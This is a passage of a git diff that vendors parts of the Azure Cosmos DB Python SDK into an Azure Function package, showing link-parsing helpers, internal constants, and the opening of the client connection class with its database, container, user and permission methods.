"offerEnableRUPerMinuteThroughput" + ] + + if options.get("disableRUPerMinuteUsage"): + headers[http_constants.HttpHeaders.DisableRUPerMinuteUsage] = options["disableRUPerMinuteUsage"] + + if options.get("changeFeed") is True: + # On REST level, change feed is using IfNoneMatch/ETag instead of continuation. 
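+ # For example (hypothetical values, not part of the upstream source): options of + # {"changeFeed": True, "continuation": "etag-42"} resume the feed after that etag via an + # If-None-Match: etag-42 header, while an explicit isStartFromBeginning=False maps to + # If-None-Match: * (only changes from now on); the A-IM header then marks the request as + # an incremental change-feed read.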
+ if_none_match_value = None + if options.get("continuation"): + if_none_match_value = options["continuation"] + # an explicit isStartFromBeginning=False means "only changes from now on", signalled with "*" + elif "isStartFromBeginning" in options and not options["isStartFromBeginning"]: + if_none_match_value = "*" + if if_none_match_value: + headers[http_constants.HttpHeaders.IfNoneMatch] = if_none_match_value + headers[http_constants.HttpHeaders.AIM] = http_constants.HttpHeaders.IncrementalFeedHeaderValue + else: + if options.get("continuation"): + headers[http_constants.HttpHeaders.Continuation] = options["continuation"] + + if options.get("populatePartitionKeyRangeStatistics"): + headers[http_constants.HttpHeaders.PopulatePartitionKeyRangeStatistics] = options[ + "populatePartitionKeyRangeStatistics" + ] + + if options.get("populateQuotaInfo"): + headers[http_constants.HttpHeaders.PopulateQuotaInfo] = options["populateQuotaInfo"] + + if options.get("maxIntegratedCacheStaleness"): + headers[http_constants.HttpHeaders.DedicatedGatewayCacheStaleness] = options["maxIntegratedCacheStaleness"] + + return headers + + +def GetResourceIdOrFullNameFromLink(resource_link): + """Gets resource id or full name from resource link. + + :param str resource_link: + :return: The resource id or full name from the resource link. + :rtype: str + """ + # For name-based links, the resource link is the full name + if IsNameBased(resource_link): + return TrimBeginningAndEndingSlashes(resource_link) + + # Padding the resource link with leading and trailing slashes if not already present + if resource_link[-1] != "/": + resource_link = resource_link + "/" + + if resource_link[0] != "/": + resource_link = "/" + resource_link + + # The path will be in the form of + # /[resourceType]/[resourceId]/ .... /[resourceType]/[resourceId]/ or + # /[resourceType]/[resourceId]/ .... /[resourceType]/ + # The result of split will be in the form of + # ["", [resourceType], [resourceId] ... ,[resourceType], [resourceId], ""] + # In the first case, to extract the resourceId it will be the element + # before last ( at length -2 ) and the type will be the one before it + # ( at length -3 ) + # In the second case, to extract the resource type it will be the element + # before last ( at length -2 ) + path_parts = resource_link.split("/") + if len(path_parts) % 2 == 0: + # request in form + # /[resourceType]/[resourceId]/ .... /[resourceType]/[resourceId]/. + return str(path_parts[-2]) + return None + + +def GenerateGuidId(): + """Gets a random GUID. + + Note that here we use python's UUID generation library. Basically UUID + is the same as GUID when represented as a string. + + :return: + The generated random GUID. + :rtype: str + """ + return str(uuid.uuid4()) + + +def GetPathFromLink(resource_link, resource_type=""): + """Gets path from resource link with optional resource type. + + :param str resource_link: + :param str resource_type: + :return: Path from resource link with resource type appended (if provided). + :rtype: str + """ + resource_link = TrimBeginningAndEndingSlashes(resource_link) + + if IsNameBased(resource_link): + # Replace special characters in string using the %xx escape.
For example, + # space(' ') would be replaced by %20. This function is intended for quoting + # the path section of the URL and excludes '/' to be quoted as that's the + # default safe char + resource_link = urllib_quote(resource_link) + + # Padding leading and trailing slashes to the path returned both for name based and resource id based links + if resource_type: + return "/" + resource_link + "/" + resource_type + "/" + return "/" + resource_link + "/" + + +def IsNameBased(link): + """Finds whether the link is name-based or not. + + :param str link: + + :return: + True if link is name-based; otherwise, False. + :rtype: bool + """ + if not link: + return False + + # trimming the leading "/" + if link.startswith("/") and len(link) > 1: + link = link[1:] + + # Splitting the link (separated by "/") into parts + parts = link.split("/") + + # First part should be "dbs" + if not (parts and parts[0].lower() == "dbs"): + return False + + # The second part is the database id (ResourceID or Name) and cannot be empty + if len(parts) < 2 or not parts[1]: + return False + + # Either ResourceID or database name + databaseID = parts[1] + + # Length of databaseID (in case of ResourceID) is always 8 + if len(databaseID) != 8: + return True + + return not IsValidBase64String(str(databaseID)) + + +def IsMasterResource(resourceType): + return resourceType in ( + http_constants.ResourceType.Offer, + http_constants.ResourceType.Database, + http_constants.ResourceType.User, + http_constants.ResourceType.Permission, + http_constants.ResourceType.Topology, + http_constants.ResourceType.DatabaseAccount, + http_constants.ResourceType.PartitionKeyRange, + http_constants.ResourceType.Collection, + ) + + +def IsDatabaseLink(link): + """Finds whether the link is a database Self Link or a database ID-based link. + + :param str link: Link to analyze + :return: True or False. + :rtype: bool + """ + if not link: + return False + + # trimming the leading and trailing "/" from the input string + link = TrimBeginningAndEndingSlashes(link) + + # Splitting the link (separated by "/") into parts + parts = link.split("/") + + if len(parts) != 2: + return False + + # First part should be "dbs" + if not parts[0] or not parts[0].lower() == "dbs": + return False + + # The second part is the database id (ResourceID or Name) and cannot be empty + if not parts[1]: + return False + + return True + + +def IsItemContainerLink(link): # pylint: disable=too-many-return-statements + """Finds whether the link is a document collection Self Link or a document collection ID-based link. + + :param str link: Link to analyze + :return: True or False.
+ :rtype: bool + """ + if not link: + return False + + # trimming the leading and trailing "/" from the input string + link = TrimBeginningAndEndingSlashes(link) + + # Splitting the link (separated by "/") into parts + parts = link.split("/") + + if len(parts) != 4: + return False + + # First part should be "dbs" + if not parts[0] or not parts[0].lower() == "dbs": + return False + + # Third part should be "colls" + if not parts[2] or not parts[2].lower() == "colls": + return False + + # The second part is the database id (ResourceID or Name) and cannot be empty + if not parts[1]: + return False + + # The fourth part is the document collection id (ResourceID or Name) and cannot be empty + if not parts[3]: + return False + + return True + + +def GetItemContainerInfo(self_link, alt_content_path, id_from_response): + """Given the self link and alt_content_path from the response header and + result, extract the collection name and collection id. + + Every response header has an alt-content-path that is the owner's path in + ASCII. For document create / update requests, this can be used to get the + collection name, but for collection create response, we can't use it. + + :param str self_link: + Self link of the resource, as obtained from response result. + :param str alt_content_path: + Owner path of the resource, as obtained from response header. + :param str id_from_response: + 'id' as returned from the response result. This is only used if it is + deduced that the request was to create a collection. + :return: tuple of (collection rid, collection name) + :rtype: tuple + """ + + self_link = TrimBeginningAndEndingSlashes(self_link) + "/" + + index = IndexOfNth(self_link, "/", 4) + + if index != -1: + collection_id = self_link[0:index] + + if "colls" in self_link: + # this is a collection request + index_second_slash = IndexOfNth(alt_content_path, "/", 2) + if index_second_slash == -1: + collection_name = alt_content_path + "/colls/" + urllib_quote(id_from_response) + return collection_id, collection_name + collection_name = alt_content_path + return collection_id, collection_name + raise ValueError( + "Response Not from Server Partition, self_link: {0}, alt_content_path: {1}, id: {2}".format( + self_link, alt_content_path, id_from_response + ) + ) + + raise ValueError("Unable to parse document collection link from " + self_link) + + +def GetItemContainerLink(link): + """Gets the document collection link. + + :param str link: Resource link + :return: Document collection link. + :rtype: str + """ + link = TrimBeginningAndEndingSlashes(link) + "/" + + index = IndexOfNth(link, "/", 4) + + if index != -1: + return link[0:index] + raise ValueError("Unable to parse document collection link from " + link) + + +def IndexOfNth(s, value, n): + """Gets the index of the Nth occurrence of a given character in a string. + + :param str s: Input string + :param char value: Input char to be searched. + :param int n: Nth occurrence of char to be searched. + :return: Index of the Nth occurrence in the string. + :rtype: int + """ + remaining = n + for i, elt in enumerate(s): + if elt == value: + remaining -= 1 + if remaining == 0: + return i + return -1 + + +def IsValidBase64String(string_to_validate): + """Verifies if a string is a valid Base64 encoded string, after + replacing '-' with '/'. + + :param string string_to_validate: String to validate. + :return: Whether given string is a valid base64 string or not.
+ :rtype: bool + """ + # '-' is not a supported char for decoding in Python (same as in C# and Java, which have + # similar logic when parsing the ResourceID generated by the backend) + try: + buffer = base64.standard_b64decode(string_to_validate.replace("-", "/")) + if len(buffer) != 4: + return False + except Exception as e: # pylint: disable=broad-except + if isinstance(e, binascii.Error): + return False + raise e + return True + + +def TrimBeginningAndEndingSlashes(path): + """Trims beginning and ending slashes. + + :param str path: + + :return: + Path with beginning and ending slashes trimmed. + :rtype: str + """ + if path.startswith("/"): + # Returns substring starting from index 1 to end of the string + path = path[1:] + + if path.endswith("/"): + # Returns substring starting from beginning to last but one char in the string + path = path[:-1] + + return path + + +# Parses the paths into a list of tokens, each representing a property +def ParsePaths(paths): + if len(paths) != 1: + raise ValueError("Unsupported paths count.") + + segmentSeparator = "/" + path = paths[0] + tokens = [] + currentIndex = 0 + + while currentIndex < len(path): + if path[currentIndex] != segmentSeparator: + raise ValueError("Invalid path character at index " + str(currentIndex)) + + currentIndex += 1 + if currentIndex == len(path): + break + + # " and ' are treated specially in the sense that they can have the / (segment separator) + # between them, which is considered part of the token + if path[currentIndex] == '"' or path[currentIndex] == "'": + quote = path[currentIndex] + newIndex = currentIndex + 1 + + while True: + newIndex = path.find(quote, newIndex) + if newIndex == -1: + raise ValueError("Invalid path character at index " + str(currentIndex)) + + # check if the quote itself is escaped by a preceding \ in which case it's part of the token + if path[newIndex - 1] != "\\": + break + newIndex += 1 + + # This will extract the token excluding the quote chars + token = path[currentIndex + 1: newIndex] + tokens.append(token) + currentIndex = newIndex + 1 + else: + newIndex = path.find(segmentSeparator, currentIndex) + token = None + if newIndex == -1: + # This will extract the token from currentIndex to end of the string + token = path[currentIndex:] + currentIndex = len(path) + else: + # This will extract the token from currentIndex to the char before the segmentSeparator + token = path[currentIndex:newIndex] + currentIndex = newIndex + + token = token.strip() + tokens.append(token) + + return tokens + + +def create_scope_from_url(url): + parsed_url = urlsplit(url) + return parsed_url.scheme + "://" + parsed_url.hostname + "/.default" + + +def validate_cache_staleness_value(max_integrated_cache_staleness): + int(max_integrated_cache_staleness) # Will throw error if data type can't be converted to int + if max_integrated_cache_staleness <= 0: + raise ValueError("Parameter 'max_integrated_cache_staleness_in_ms' can only be a positive integer.") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_constants.py new file mode 100644 index 0000000..e6d8f27 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_constants.py @@ -0,0 +1,40 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and
associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Class for defining internal constants in the Azure Cosmos database service. +""" + + +class _Constants(object): + """Constants used in the azure-cosmos package""" + + UserConsistencyPolicy = "userConsistencyPolicy" + DefaultConsistencyLevel = "defaultConsistencyLevel" + + # GlobalDB related constants + WritableLocations = "writableLocations" + ReadableLocations = "readableLocations" + Name = "name" + DatabaseAccountEndpoint = "databaseAccountEndpoint" + DefaultUnavailableLocationExpirationTime = 5 * 60 * 1000 + + # ServiceDocument Resource + EnableMultipleWritableLocations = "enableMultipleWriteLocations" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_cosmos_client_connection.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_cosmos_client_connection.py new file mode 100644 index 0000000..ee1649e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_cosmos_client_connection.py @@ -0,0 +1,2625 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +# disable (too-many-lines) check +# pylint: disable=C0302 + +"""Document client class for the Azure Cosmos database service. 
+""" +# https://github.com/PyCQA/pylint/issues/3112 +# Currently pylint is locked to 2.3.3 and this is fixed in 2.4.4 +from typing import Dict, Any, Optional, TypeVar # pylint: disable=unused-import +import urllib.parse +from urllib3.util.retry import Retry +from azure.core.paging import ItemPaged # type: ignore +from azure.core import PipelineClient # type: ignore +from azure.core.exceptions import raise_with_traceback # type: ignore +from azure.core.pipeline.policies import ( # type: ignore + HTTPPolicy, + ContentDecodePolicy, + HeadersPolicy, + UserAgentPolicy, + NetworkTraceLoggingPolicy, + CustomHookPolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + ProxyPolicy) + +from . import _base as base +from . import documents +from .documents import ConnectionPolicy +from . import _constants as constants +from . import http_constants +from . import _query_iterable as query_iterable +from . import _runtime_constants as runtime_constants +from . import _request_object +from . import _synchronized_request as synchronized_request +from . import _global_endpoint_manager as global_endpoint_manager +from ._routing import routing_map_provider +from ._retry_utility import ConnectionRetryPolicy +from . import _session +from . import _utils +from .partition_key import _Undefined, _Empty +from ._auth_policy import CosmosBearerTokenCredentialPolicy + +ClassType = TypeVar("ClassType") +# pylint: disable=protected-access + + +class CosmosClientConnection(object): # pylint: disable=too-many-public-methods,too-many-instance-attributes + """Represents a document client. + + Provides a client-side logical representation of the Azure Cosmos + service. This client is used to configure and execute requests against the + service. + + The service client encapsulates the endpoint and credentials used to access + the Azure Cosmos service. + """ + + class _QueryCompatibilityMode: + Default = 0 + Query = 1 + SqlQuery = 2 + + # default number precisions + _DefaultNumberHashPrecision = 3 + _DefaultNumberRangePrecision = -1 + + # default string precision + _DefaultStringHashPrecision = 3 + _DefaultStringRangePrecision = -1 + + def __init__( + self, + url_connection, # type: str + auth, # type: Dict[str, Any] + connection_policy=None, # type: Optional[ConnectionPolicy] + consistency_level=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """ + :param str url_connection: + The URL for connecting to the DB server. + :param dict auth: + Contains 'masterKey' or 'resourceTokens', where + auth['masterKey'] is the default authorization key to use to + create the client, and auth['resourceTokens'] is the alternative + authorization key. + :param documents.ConnectionPolicy connection_policy: + The connection policy for the client. + :param documents.ConsistencyLevel consistency_level: + The default consistency policy for client operations. 
+ + """ + self.url_connection = url_connection + + self.master_key = None + self.resource_tokens = None + self.aad_credentials = None + if auth is not None: + self.master_key = auth.get("masterKey") + self.resource_tokens = auth.get("resourceTokens") + self.aad_credentials = auth.get("clientSecretCredential") + + if auth.get("permissionFeed"): + self.resource_tokens = {} + for permission_feed in auth["permissionFeed"]: + resource_parts = permission_feed["resource"].split("/") + id_ = resource_parts[-1] + self.resource_tokens[id_] = permission_feed["_token"] + + self.connection_policy = connection_policy or ConnectionPolicy() + + self.partition_resolvers = {} # type: Dict[str, Any] + + self.partition_key_definition_cache = {} # type: Dict[str, Any] + + self.default_headers = { + http_constants.HttpHeaders.CacheControl: "no-cache", + http_constants.HttpHeaders.Version: http_constants.Versions.CurrentVersion, + # For single partition query with aggregate functions we would try to accumulate the results on the SDK. + # We need to set continuation as not expected. + http_constants.HttpHeaders.IsContinuationExpected: False, + } + + # Keeps the latest response headers from the server. + self.last_response_headers = None + + self._useMultipleWriteLocations = False + self._global_endpoint_manager = global_endpoint_manager._GlobalEndpointManager(self) + + retry_policy = None + if isinstance(self.connection_policy.ConnectionRetryConfiguration, HTTPPolicy): + retry_policy = self.connection_policy.ConnectionRetryConfiguration + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, int): + retry_policy = ConnectionRetryPolicy(total=self.connection_policy.ConnectionRetryConfiguration) + elif isinstance(self.connection_policy.ConnectionRetryConfiguration, Retry): + # Convert a urllib3 retry policy to a Pipeline policy + retry_policy = ConnectionRetryPolicy( + retry_total=self.connection_policy.ConnectionRetryConfiguration.total, + retry_connect=self.connection_policy.ConnectionRetryConfiguration.connect, + retry_read=self.connection_policy.ConnectionRetryConfiguration.read, + retry_status=self.connection_policy.ConnectionRetryConfiguration.status, + retry_backoff_max=self.connection_policy.ConnectionRetryConfiguration.BACKOFF_MAX, + retry_on_status_codes=list(self.connection_policy.ConnectionRetryConfiguration.status_forcelist), + retry_backoff_factor=self.connection_policy.ConnectionRetryConfiguration.backoff_factor + ) + else: + raise TypeError( + "Unsupported retry policy. 
Must be an azure.cosmos.ConnectionRetryPolicy, int, or urllib3.Retry") + + proxies = kwargs.pop('proxies', {}) + if self.connection_policy.ProxyConfiguration and self.connection_policy.ProxyConfiguration.Host: + host = self.connection_policy.ProxyConfiguration.Host + url = urllib.parse.urlparse(host) + proxy = host if url.port else host + ":" + str(self.connection_policy.ProxyConfiguration.Port) + proxies.update({url.scheme: proxy}) + + self._user_agent = _utils.get_user_agent() + + credentials_policy = None + if self.aad_credentials: + scopes = base.create_scope_from_url(self.url_connection) + credentials_policy = CosmosBearerTokenCredentialPolicy(self.aad_credentials, scopes) + + policies = [ + HeadersPolicy(**kwargs), + ProxyPolicy(proxies=proxies), + UserAgentPolicy(base_user_agent=self._user_agent, **kwargs), + ContentDecodePolicy(), + retry_policy, + credentials_policy, + CustomHookPolicy(**kwargs), + NetworkTraceLoggingPolicy(**kwargs), + DistributedTracingPolicy(**kwargs), + HttpLoggingPolicy(**kwargs), + ] + + transport = kwargs.pop("transport", None) + self.pipeline_client = PipelineClient(base_url=url_connection, transport=transport, policies=policies) + + # Query compatibility mode. + # Allows to specify compatibility mode used by client when making query requests. Should be removed when + # application/sql is no longer supported. + self._query_compatibility_mode = CosmosClientConnection._QueryCompatibilityMode.Default + + # Routing map provider + self._routing_map_provider = routing_map_provider.SmartRoutingMapProvider(self) + + database_account = self._global_endpoint_manager._GetDatabaseAccount(**kwargs) + self._global_endpoint_manager.force_refresh(database_account) + + # Use database_account if no consistency passed in to verify consistency level to be used + self._set_client_consistency_level(database_account, consistency_level) + + def _set_client_consistency_level( + self, + database_account: ClassType, + consistency_level: Optional[str], + ) -> None: + """Checks if consistency level param was passed in by user and sets it to that value or to the account default. + + :param database_account: The database account to be used to check consistency levels + :type database_account: ~azure.cosmos.documents.DatabaseAccount + :param consistency_level: The consistency level passed in by the user + :type consistency_level: Optional[str] + :rtype: None + """ + if consistency_level is None: + # Set to default level present in account + user_consistency_policy = database_account.ConsistencyPolicy + consistency_level = user_consistency_policy.get(constants._Constants.DefaultConsistencyLevel) + else: + # Set consistency level header to be used for the client + self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + + if consistency_level == documents.ConsistencyLevel.Session: + # create a session - this is maintained only if the default consistency level + # on the client is set to session, or if the user explicitly sets it as a property + # via setter + self.default_headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + self.session = _session.Session(self.url_connection) + else: + self.session = None # type: ignore + + @property + def Session(self): + """Gets the session object from the client. """ + return self.session + + @Session.setter + def Session(self, session): + """Sets a session object on the document client. 
+ + This will override the existing session. + """ + self.session = session + + @property + def WriteEndpoint(self): + """Gets the current write endpoint for a geo-replicated database account. + """ + return self._global_endpoint_manager.get_write_endpoint() + + @property + def ReadEndpoint(self): + """Gets the current read endpoint for a geo-replicated database account. + """ + return self._global_endpoint_manager.get_read_endpoint() + + def RegisterPartitionResolver(self, database_link, partition_resolver): + """Registers the partition resolver associated with the database link. + + :param str database_link: + Database Self Link or ID based link. + :param object partition_resolver: + An instance of PartitionResolver. + + """ + if not database_link: + raise ValueError("database_link is None or empty.") + + if partition_resolver is None: + raise ValueError("partition_resolver is None.") + + self.partition_resolvers = {base.TrimBeginningAndEndingSlashes(database_link): partition_resolver} + + def GetPartitionResolver(self, database_link): + """Gets the partition resolver associated with the database link. + + :param str database_link: + Database self link or ID based link. + + :return: + An instance of PartitionResolver. + :rtype: object + + """ + if not database_link: + raise ValueError("database_link is None or empty.") + + return self.partition_resolvers.get(base.TrimBeginningAndEndingSlashes(database_link)) + + def CreateDatabase(self, database, options=None, **kwargs): + """Creates a database. + + :param dict database: + The Azure Cosmos database to create. + :param dict options: + The request options for the request. + + :return: + The Database that was created. + :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(database) + path = "/dbs" + return self.Create(database, path, "dbs", None, None, options, **kwargs) + + def ReadDatabase(self, database_link, options=None, **kwargs): + """Reads a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: + The Database that was read. + :rtype: dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return self.Read(path, "dbs", database_id, None, options, **kwargs) + + def ReadDatabases(self, options=None, **kwargs): + """Reads all databases. + + :param dict options: + The request options for the request. + + :return: + Query Iterable of Databases. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryDatabases(None, options, **kwargs) + + def QueryDatabases(self, query, options=None, **kwargs): + """Queries databases. + + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: Query Iterable of Databases. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + def fetch_fn(options): + return ( + self.__QueryFeed( + "/dbs", "dbs", "", lambda r: r["Databases"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReadContainers(self, database_link, options=None, **kwargs): + """Reads all collections in a database. + + :param str database_link: + The link to the database.
+ :param dict options: + The request options for the request. + + :return: Query Iterable of Collections. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryContainers(database_link, None, options, **kwargs) + + def QueryContainers(self, database_link, query, options=None, **kwargs): + """Queries collections in a database. + + :param str database_link: + The link to the database. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: Query Iterable of Collections. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link, "colls") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "colls", database_id, lambda r: r["DocumentCollections"], + lambda _, body: body, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def CreateContainer(self, database_link, collection, options=None, **kwargs): + """Creates a collection in a database. + + :param str database_link: + The link to the database. + :param dict collection: + The Azure Cosmos collection to create. + :param dict options: + The request options for the request. + + :return: The Collection that was created. + :rtype: dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(collection) + path = base.GetPathFromLink(database_link, "colls") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return self.Create(collection, path, "colls", database_id, None, options, **kwargs) + + def ReplaceContainer(self, collection_link, collection, options=None, **kwargs): + """Replaces a collection and returns it. + + :param str collection_link: + The link to the collection entity. + :param dict collection: + The collection to be used. + :param dict options: + The request options for the request. + + :return: + The new Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + CosmosClientConnection.__ValidateResource(collection) + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return self.Replace(collection, path, "colls", collection_id, None, options, **kwargs) + + def ReadContainer(self, collection_link, options=None, **kwargs): + """Reads a collection. + + :param str collection_link: + The link to the document collection. + :param dict options: + The request options for the request. + + :return: + The read Collection. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(collection_link) + collection_id = base.GetResourceIdOrFullNameFromLink(collection_link) + return self.Read(path, "colls", collection_id, None, options, **kwargs) + + def CreateUser(self, database_link, user, options=None, **kwargs): + """Creates a user. + + :param str database_link: + The link to the database. + :param dict user: + The Azure Cosmos user to create. + :param dict options: + The request options for the request. + + :return: + The created User.
+ :rtype: + dict + + """ + if options is None: + options = {} + + database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user) + return self.Create(user, path, "users", database_id, None, options, **kwargs) + + def UpsertUser(self, database_link, user, options=None, **kwargs): + """Upserts a user. + + :param str database_link: + The link to the database. + :param dict user: + The Azure Cosmos user to upsert. + :param dict options: + The request options for the request. + + :return: + The upserted User. + :rtype: dict + """ + if options is None: + options = {} + + database_id, path = self._GetDatabaseIdWithPathForUser(database_link, user) + return self.Upsert(user, path, "users", database_id, None, options, **kwargs) + + def _GetDatabaseIdWithPathForUser(self, database_link, user): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(user) + path = base.GetPathFromLink(database_link, "users") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return database_id, path + + def ReadUser(self, user_link, options=None, **kwargs): + """Reads a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + The read User. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link) + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return self.Read(path, "users", user_id, None, options, **kwargs) + + def ReadUsers(self, database_link, options=None, **kwargs): + """Reads all users in a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + :return: + Query Iterable of Users. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryUsers(database_link, None, options, **kwargs) + + def QueryUsers(self, database_link, query, options=None, **kwargs): + """Queries users in a database. + + :param str database_link: + The link to the database. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Users. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link, "users") + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "users", database_id, lambda r: r["Users"], + lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def DeleteDatabase(self, database_link, options=None, **kwargs): + """Deletes a database. + + :param str database_link: + The link to the database. + :param dict options: + The request options for the request. + + :return: + The deleted Database. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(database_link) + database_id = base.GetResourceIdOrFullNameFromLink(database_link) + return self.DeleteResource(path, "dbs", database_id, None, options, **kwargs) + + def CreatePermission(self, user_link, permission, options=None, **kwargs): + """Creates a permission for a user. + + :param str user_link: + The link to the user entity. + :param dict permission: + The Azure Cosmos user permission to create. + :param dict options: + The request options for the request.
+ + :return: + The created Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path, user_id = self._GetUserIdWithPathForPermission(permission, user_link) + return self.Create(permission, path, "permissions", user_id, None, options, **kwargs) + + def UpsertPermission(self, user_link, permission, options=None, **kwargs): + """Upserts a permission for a user. + + :param str user_link: + The link to the user entity. + :param dict permission: + The Azure Cosmos user permission to upsert. + :param dict options: + The request options for the request. + + :return: + The upserted Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path, user_id = self._GetUserIdWithPathForPermission(permission, user_link) + return self.Upsert(permission, path, "permissions", user_id, None, options, **kwargs) + + def _GetUserIdWithPathForPermission(self, permission, user_link): # pylint: disable=no-self-use + CosmosClientConnection.__ValidateResource(permission) + path = base.GetPathFromLink(user_link, "permissions") + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + return path, user_id + + def ReadPermission(self, permission_link, options=None, **kwargs): + """Reads a permission. + + :param str permission_link: + The link to the permission. + :param dict options: + The request options for the request. + + :return: + The read Permission. + :rtype: + dict + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(permission_link) + permission_id = base.GetResourceIdOrFullNameFromLink(permission_link) + return self.Read(path, "permissions", permission_id, None, options, **kwargs) + + def ReadPermissions(self, user_link, options=None, **kwargs): + """Reads all permissions for a user. + + :param str user_link: + The link to the user entity. + :param dict options: + The request options for the request. + + :return: + Query Iterable of Permissions. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + return self.QueryPermissions(user_link, None, options, **kwargs) + + def QueryPermissions(self, user_link, query, options=None, **kwargs): + """Queries permissions for a user. + + :param str user_link: + The link to the user entity. + :param (str or dict) query: + :param dict options: + The request options for the request. + + :return: + Query Iterable of Permissions. + :rtype: + query_iterable.QueryIterable + + """ + if options is None: + options = {} + + path = base.GetPathFromLink(user_link, "permissions") + user_id = base.GetResourceIdOrFullNameFromLink(user_link) + + def fetch_fn(options): + return ( + self.__QueryFeed( + path, "permissions", user_id, lambda r: r["Permissions"], lambda _, b: b, query, options, **kwargs + ), + self.last_response_headers, + ) + + return ItemPaged( + self, query, options, fetch_function=fetch_fn, page_iterator_class=query_iterable.QueryIterable + ) + + def ReplaceUser(self, user_link, user, options=None, **kwargs): + """Replaces a user and returns it. + + :param str user_link: + The link to the user entity. + :param dict user: + :param dict options: + The request options for the request. + + :return: + 